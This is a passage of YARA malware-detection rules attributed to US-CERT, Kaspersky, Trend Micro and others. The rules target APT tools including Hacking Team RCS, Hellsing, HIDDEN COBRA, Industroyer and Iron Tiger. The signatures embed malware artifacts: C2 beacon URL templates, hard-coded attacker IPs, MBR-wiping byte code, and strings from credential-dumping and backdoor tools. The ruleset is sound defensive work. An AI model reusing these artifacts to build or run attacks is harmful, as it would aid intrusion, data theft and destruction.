"https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $my_string_one = "/zapoy/gate.php" $my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55 FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A 55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 } $my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" $my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8 8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 } $my_string_five = "fuckyou1" $my_string_six = "xtool.exe" condition: ($my_string_one and $my_string_two) or ($my_string_three or $my_string_four) or ($my_string_five and $my_string_six) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule bin_ndisk { meta: description = "Hacking Team Disclosure Sample - file ndisk.sys" author = "Florian Roth" reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/" date = "2015-07-07" hash = "cf5089752ba51ae827971272a5b761a4ab0acd84" strings: $s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide $s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide $s3 = "\\Driver\\DeepFrz" fullword wide $s4 = "Microsoft Kernel Disk Manager" fullword wide $s5 = "ndisk.sys" fullword wide $s6 = "\\Device\\MSH4DEV1" fullword wide $s7 = "\\DosDevices\\MSH4DEV1" fullword wide $s8 = "built by: WinDDK" fullword wide condition: uint16(0) == 0x5a4d and filesize < 30KB and 6 of them } rule Hackingteam_Elevator_DLL { meta: description = "Hacking Team Disclosure Sample - file elevator.dll" author = "Florian Roth" reference = "http://t.co/EG0qtVcKLh" date = "2015-07-07" hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060" strings: $s1 = "\\sysnative\\CI.dll" fullword ascii $s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii $s3 = "mitmproxy0" fullword ascii $s4 = "\\insert_cert.exe" fullword ascii $s5 = "elevator.dll" fullword ascii $s6 = "CRTDLL.DLL" fullword ascii $s7 = "fail adding cert" fullword ascii $s8 = "DownloadingFile" fullword ascii $s9 = "fail adding cert: %s" fullword ascii $s10 = "InternetOpenA fail" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and 6 of them } rule HackingTeam_Elevator_EXE { meta: description = "Hacking Team Disclosure Sample - file elevator.exe" author = "Florian Roth" reference = "Hacking Team Disclosure elevator.c" date = "2015-07-07" hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c" hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d" hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1" strings: $x1 = "CRTDLL.DLL" fullword ascii $x2 = "\\sysnative\\CI.dll" fullword ascii $x3 = "\\SystemRoot\\system32\\CI.dll" fullword ascii $x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "[*] traversing processes" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "_getkprocess" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "[*] LoaderConfig %p" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "loader.obj" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii /* PEStudio Blacklist: strings */ $s6 = "[*] token restore" fullword ascii /* PEStudio Blacklist: strings */ $s7 = "elevator.obj" fullword ascii $s8 = "_getexport" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of ($x*) and 3 of ($s*) } rule RCS_Backdoor { meta: description = "Hacking Team RCS Backdoor" author = "botherder https://github.com/botherder" strings: $filter1 = "$debug3" $filter2 = "$log2" $filter3 = "error2" $debug1 = /\- (C)hecking components/ wide ascii $debug2 = /\- (A)ctivating hiding system/ wide ascii $debug3 = /(f)ully operational/ wide ascii $log1 = /\- Browser activity \(FF\)/ wide ascii $log2 = /\- Browser activity \(IE\)/ wide ascii // Cause false positives. //$log3 = /\- About to call init routine at %p/ wide ascii //$log4 = /\- Calling init routine at %p/ wide ascii $error1 = /\[Unable to deploy\]/ wide ascii $error2 = /\[The system is already monitored\]/ wide ascii condition: (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*) } rule RCS_Scout { meta: description = "Hacking Team RCS Scout" author = "botherder https://github.com/botherder" strings: $filter1 = "$engine5" $filter2 = "$start4" $filter3 = "$upd2" $filter4 = "$lookma6" $engine1 = /(E)ngine started/ wide ascii $engine2 = /(R)unning in background/ wide ascii $engine3 = /(L)ocking doors/ wide ascii $engine4 = /(R)otors engaged/ wide ascii $engine5 = /(I)\'m going to start it/ wide ascii $start1 = /Starting upgrade\!/ wide ascii $start2 = /(I)\'m going to start the program/ wide ascii $start3 = /(i)s it ok\?/ wide ascii $start4 = /(C)lick to start the program/ wide ascii $upd1 = /(U)pdJob/ wide ascii $upd2 = /(U)pdTimer/ wide ascii $lookma1 = /(O)wning PCI bus/ wide $lookma2 = /(F)ormatting bios/ wide $lookma3 = /(P)lease insert a disk in drive A:/ wide $lookma4 = /(U)pdating CPU microcode/ wide $lookma5 = /(N)ot sure what's happening/ wide $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide condition: (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule apt_hellsing_implantstrings { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing implants" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="the file uploaded failed !" $a2="ping 127.0.0.1" $b1="the file downloaded failed !" $b2="common.asp" $c="xweber_server.exe" $d="action=" $debugpath1="d:\\Hellsing\\release\\msger\\" nocase $debugpath2="d:\\hellsing\\sys\\xrat\\" nocase $debugpath3="D:\\Hellsing\\release\\exe\\" nocase $debugpath4="d:\\hellsing\\sys\\xkat\\" nocase $debugpath5="e:\\Hellsing\\release\\clare" nocase $debugpath6="e:\\Hellsing\\release\\irene\\" nocase $debugpath7="d:\\hellsing\\sys\\irene\\" nocase $e="msger_server.dll" $f="ServiceMain" condition: ($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000 } rule apt_hellsing_installer { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing xweber/msger installers" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"" $a1="xweber_install_uac.exe" $a2="system32\\cmd.exe" wide $a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=" $a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g=" $a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==" $a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide $a10="%SystemRoot%\\system32\\cmd.exe" wide $a11="msger_install.dll" $a12={00 65 78 2E 64 6C 6C 00} condition: ($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000 } rule apt_hellsing_proxytool { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing proxy testing tool" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="PROXY_INFO: automatic proxy url => %s " $a2="PROXY_INFO: connection type => %d " $a3="PROXY_INFO: proxy server => %s " $a4="PROXY_INFO: bypass list => %s " $a5="InternetQueryOption failed with GetLastError() %d" $a6="D:\\Hellsing\\release\\exe\\exe\\" nocase condition: ($mz at 0) and (2 of ($a*)) and filesize < 300000 } rule apt_hellsing_xkat { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing xKat tool" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="\\Dbgv.sys" $a2="XKAT_BIN" $a3="release sys file error." $a4="driver_load error. " $a5="driver_create error." $a6="delete file:%s error." $a7="delete file:%s ok." $a8="kill pid:%d error." $a9="kill pid:%d ok." $a10="-pid-delete" $a11="kill and delete pid:%d error." $a12="kill and delete pid:%d ok." condition: ($mz at 0) and (6 of ($a*)) and filesize < 300000 } rule apt_hellsing_msgertype2 { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing msger type 2 implants" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="%s\\system\\%d.txt" $a2="_msger" $a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s" $a4="http://%s/data/%s.1000001000" $a5="/lib/common.asp?action=user_upload&file=" $a6="%02X-%02X-%02X-%02X-%02X-%02X" condition: ($mz at 0) and (4 of ($a*)) and filesize < 500000 } rule apt_hellsing_irene { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing msger irene installer" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="\\Drivers\\usbmgr.tmp" wide $a2="\\Drivers\\usbmgr.sys" wide $a3="common_loadDriver CreateFile error! " $a4="common_loadDriver StartService error && GetLastError():%d! " $a5="irene" wide $a6="aPLib v0.43 - the smaller the better" condition: ($mz at 0) and (4 of ($a*)) and filesize < 500000 } rule apt_hiddencobra_rsakey { meta: description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" author = "US-CERT" url = "https://www.us-cert.gov/ncas/alerts/TA17-164A" strings: $rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39 73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0} condition: any of them } rule apt_hiddencobra_binaries { meta: description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" author = "US-CERT" url = "https://www.us-cert.gov/ncas/alerts/TA17-164A" strings: $STR1 = "Wating" wide ascii $STR2 = "Reamin" wide ascii $STR3 = "laptos" wide ascii condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 2 of them } rule apt_hiddencobra_urlbuilder { meta: description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" author = "US-CERT" url = "https://www.us-cert.gov/ncas/alerts/TA17-164A" strings: $randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7 44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41 00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0 6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24 48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89 44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24 18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89 44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00 66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B 6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05 83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00 00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2 49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33 C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00 8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1 C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8 ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4 48 C3 } condition: $randomUrlBuilder } rule Malware_Updater { meta: Author="US-CERT Code Analysis Team" Date="2017/08/02" Incident="10132963" MD5_1="8F4FC2E10B6EC15A01E0AF24529040DD" MD5_2="584AC94142F0B7C0DF3D0ADDE6E661ED" Info="Malware may be used to update multiple systems with secondary payloads" super_rule=1 report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10132963.pdf" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $s0 = { 8A4C040480F15D80C171884C04044083F8107CEC } $s1 = { 8A4D0080F19580E97C884D00454B75F0 } condition: any of them } rule Unauthorized_Proxy_Server_RAT { meta: Author="US-CERT Code Analysis Team" Incident="10135536" MD5_1 = "C74E289AD927E81D2A1A56BC73E394AB" MD5_2 = "2950E3741D7AF69E0CA0C5013ABC4209" Info="Detects Proxy Server RAT" super_rule = 1 report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3} $s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3} $s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3} $s3 = {8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3} $s4 = {B91A7900008A140780F29A8810404975F4} $s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9FD19CA59F7E9F539CEF9F029F969C6C9E5C9D949FC99F} $s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3} $s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC} $s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24} $s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523} $s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0} $s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7} $s12 = {448BE8B84FECC44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541} $s13 = {8A0A80F9627C2380F9797F1E80F9647C0A80F96D7F0580C10BEB0D80F96F7C0A80F9787F05} condition: any of them } rule NK_SSL_PROXY{ meta: Author = "US-CERT Code Analysis Team" Date = "2018/01/09" MD5_1 = "C6F78AD187C365D117CACBEE140F6230" MD5_2 = "C01DC42F65ACAF1C917C0CC29BA63ADC" Info= "Detects NK SSL PROXY" report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $s0 = {8B4C24088A140880F24780C228881408403BC67CEF5E} $s1 = {568B74240C33C085F67E158B4C24088A140880EA2880F247881408403BC67CEF5E} $s2 = {4775401F713435747975366867766869375E2524736466} $s3 = {67686667686A75797566676467667472} $s4 = {6D2A5E265E676866676534776572} $s5 = {3171617A5853444332337765} $s6 = "ghfghjuyufgdgftr" $s7 = "q45tyu6hgvhi7^%$sdf" $s8 = "m*^&^ghfge4wer" condition: ($s0 and $s1 and $s2 and $s3 and $s4 and $s5) or ($s6 and $s7 and $s8) } rule r4_wiper_1 { meta: source = "NCCIC Partner" date = "2017-12-12" report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 } $controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 } condition: uint16(0) == 0x5a4d and uint16(uint32(0x3c)) == 0x4550 and any of them } rule r4_wiper_2 { meta: source = "NCCIC Partner" date = "2017-12-12" report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: // BIOS Extended Write $PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide $ExtendedWrite = { B4 43 B0 00 CD 13 } condition: uint16(0) == 0x5a4d and uint16(uint32(0x3c)) == 0x4550 and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule APT_Hikit_msrv { meta: author = "ThreatConnect Intelligence Research Team" strings: $m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C} condition: any of them } /* Yara Rule Set Author: Florian Roth Date: 2017-06-13 Identifier: Industroyer Reference: https://goo.gl/x81cSy */ /* Rule Set ----------------------------------------------------------------- */ rule Industroyer_Malware_1 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910" hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81" strings: $s1 = "haslo.exe" fullword ascii $s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide $s3 = "SYS_BASCON.COM" fullword wide $s4 = "*.pcmt" fullword wide $s5 = "*.pcmi" fullword wide $x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43 00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45 00 3A 00 5C 00 00 00 } $x2 = "haslo.dat\x00Crash" condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of ($x*) or 2 of them ) } rule Industroyer_Malware_2 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571" hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4" hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77" hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47" strings: $x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide $x2 = "10.15.1.69:3128" fullword wide $s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide $s2 = "/c sc stop %s" fullword wide $s3 = "sc start %ls" fullword wide $s4 = "93.115.27.57" fullword wide $s5 = "5.39.218.152" fullword wide $s6 = "tierexe" fullword wide $s7 = "comsys" fullword wide $s8 = "195.16.88.6" fullword wide $s9 = "TieringService" fullword wide $a1 = "TEMP\x00\x00DEF" fullword wide $a2 = "TEMP\x00\x00DEF-C" fullword wide $a3 = "TEMP\x00\x00DEF-WS" fullword wide $a4 = "TEMP\x00\x00DEF-EP" fullword wide $a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide $a6 = "TEMP\x00\x00DC-2" fullword wide $a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide $a8 = "TEMP\x00\x00SRV_WSUS" fullword wide $a9 = "TEMP\x00\x00SRV_DC-2" fullword wide $a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) or 3 of them or 1 of ($a*) ) or ( 5 of them ) } rule Industroyer_Portscan_3 { meta: description = "Detects Industroyer related custom port scaner" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f" strings: $s1 = "!ZBfamily" fullword ascii $s2 = ":g/outddomo;" fullword ascii $s3 = "GHIJKLMNOTST" fullword ascii /* Decompressed File */ $d1 = "Error params Arguments!!!" fullword wide $d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide $d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide $d4 = "Error IP Range %ls - %ls" fullword wide $d5 = "Can't closesocket." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 500KB and all of ($s*) or 2 of ($d*) ) } rule Industroyer_Portscan_3_Output { meta: description = "Detects Industroyer related custom port scaner output file" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" strings: $s1 = "WSA library load complite." fullword ascii $s2 = "Connection refused" fullword ascii condition: all of them } rule Industroyer_Malware_4 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561" strings: $s1 = "haslo.dat" fullword wide $s2 = "defragsvc" fullword ascii /* .dat\x00\x00Crash */ $a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of ($s*) or $a1 ) } rule Industroyer_Malware_5 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad" strings: $x1 = "D2MultiCommService.exe" fullword ascii $x2 = "Crash104.dll" fullword ascii $x3 = "iec104.log" fullword ascii $x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii $s1 = "Error while getaddrinfo executing: %d" fullword ascii $s2 = "return info-Remote command" fullword ascii $s3 = "Error killing process ..." fullword ascii $s4 = "stop_comm_service_name" fullword ascii $s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and ( 1 of ($x*) or 4 of them ) ) or ( all of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule IronTiger_ASPXSpy { meta: author = "Cyber Safety Solutions, Trend Micro" description = "ASPXSpy detection. It might be used by other fraudsters" reference = "http://goo.gl/T5fSJC" strings: $str1 = "ASPXSpy" nocase wide ascii $str2 = "IIS Spy" nocase wide ascii $str3 = "protected void DGCoW(object sender,EventArgs e)" nocase wide ascii condition: any of ($str*) } rule IronTiger_ChangePort_Toolkit_driversinstall { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - Changeport Toolkit driverinstall" reference = "http://goo.gl/T5fSJC" strings: $str1 = "openmydoor" nocase wide ascii $str2 = "Install service error" nocase wide ascii $str3 = "start remove service" nocase wide ascii $str4 = "NdisVersion" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_ChangePort_Toolkit_ChangePortExe { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - Toolkit ChangePort" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Unable to alloc the adapter!" nocase wide ascii $str2 = "Wait for master fuck" nocase wide ascii $str3 = "xx.exe <HOST> <PORT>" nocase wide ascii $str4 = "chkroot2007" nocase wide ascii $str5 = "Door is bind on %s" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_dllshellexc2010 { meta: author = "Cyber Safety Solutions, Trend Micro" description = "dllshellexc2010 Exchange backdoor + remote shell" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Microsoft.Exchange.Clients.Auth.dll" nocase ascii wide $str2 = "Dllshellexc2010" nocase wide ascii $str3 = "Users\\ljw\\Documents" nocase wide ascii $bla1 = "please input path" nocase wide ascii $bla2 = "auth.owa" nocase wide ascii condition: (uint16(0) == 0x5a4d) and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_dnstunnel { meta: author = "Cyber Safety Solutions, Trend Micro" description = "This rule detects a dns tunnel tool used in Operation Iron Tiger" reference = "http://goo.gl/T5fSJC" strings: $str1 = "\\DnsTunClient\\" nocase wide ascii $str2 = "\\t-DNSTunnel\\" nocase wide ascii $str3 = "xssok.blogspot" nocase wide ascii $str4 = "dnstunclient" nocase wide ascii $mistake1 = "because of error, can not analysis" nocase wide ascii $mistake2 = "can not deal witn the error" nocase wide ascii $mistake3 = "the other retun one RST" nocase wide ascii $mistake4 = "Coversation produce one error" nocase wide ascii $mistake5 = "Program try to use the have deleted the buffer" nocase wide ascii condition: (uint16(0) == 0x5a4d) and ((any of ($str*)) or (any of ($mistake*))) } rule IronTiger_EFH3_encoder { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger EFH3 Encoder" reference = "http://goo.gl/T5fSJC" strings: $str1 = "EFH3 [HEX] [SRCFILE] [DSTFILE]" nocase wide ascii $str2 = "123.EXE 123.EFH" nocase wide ascii $str3 = "ENCODER: b[i]: = " nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_GetPassword_x64 { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - GetPassword x64" reference = "http://goo.gl/T5fSJC" strings: $str1 = "(LUID ERROR)" nocase wide ascii $str2 = "Users\\K8team\\Desktop\\GetPassword" nocase wide ascii $str3 = "Debug x64\\GetPassword.pdb" nocase wide ascii $bla1 = "Authentication Package:" nocase wide ascii $bla2 = "Authentication Domain:" nocase wide ascii $bla3 = "* Password:" nocase wide ascii $bla4 = "Primary User:" nocase wide ascii condition: uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_GetUserInfo { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - GetUserInfo" reference = "http://goo.gl/T5fSJC" strings: $str1 = "getuserinfo username" nocase wide ascii $str2 = "joe@joeware.net" nocase wide ascii $str3 = "If . specified for userid," nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_Gh0stRAT_variant { meta: author = "Cyber Safety Solutions, Trend Micro" description = "This is a detection for a s.exe variant seen in Op. Iron Tiger" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Game Over Good Luck By Wind" nocase wide ascii $str2 = "ReleiceName" nocase wide ascii $str3 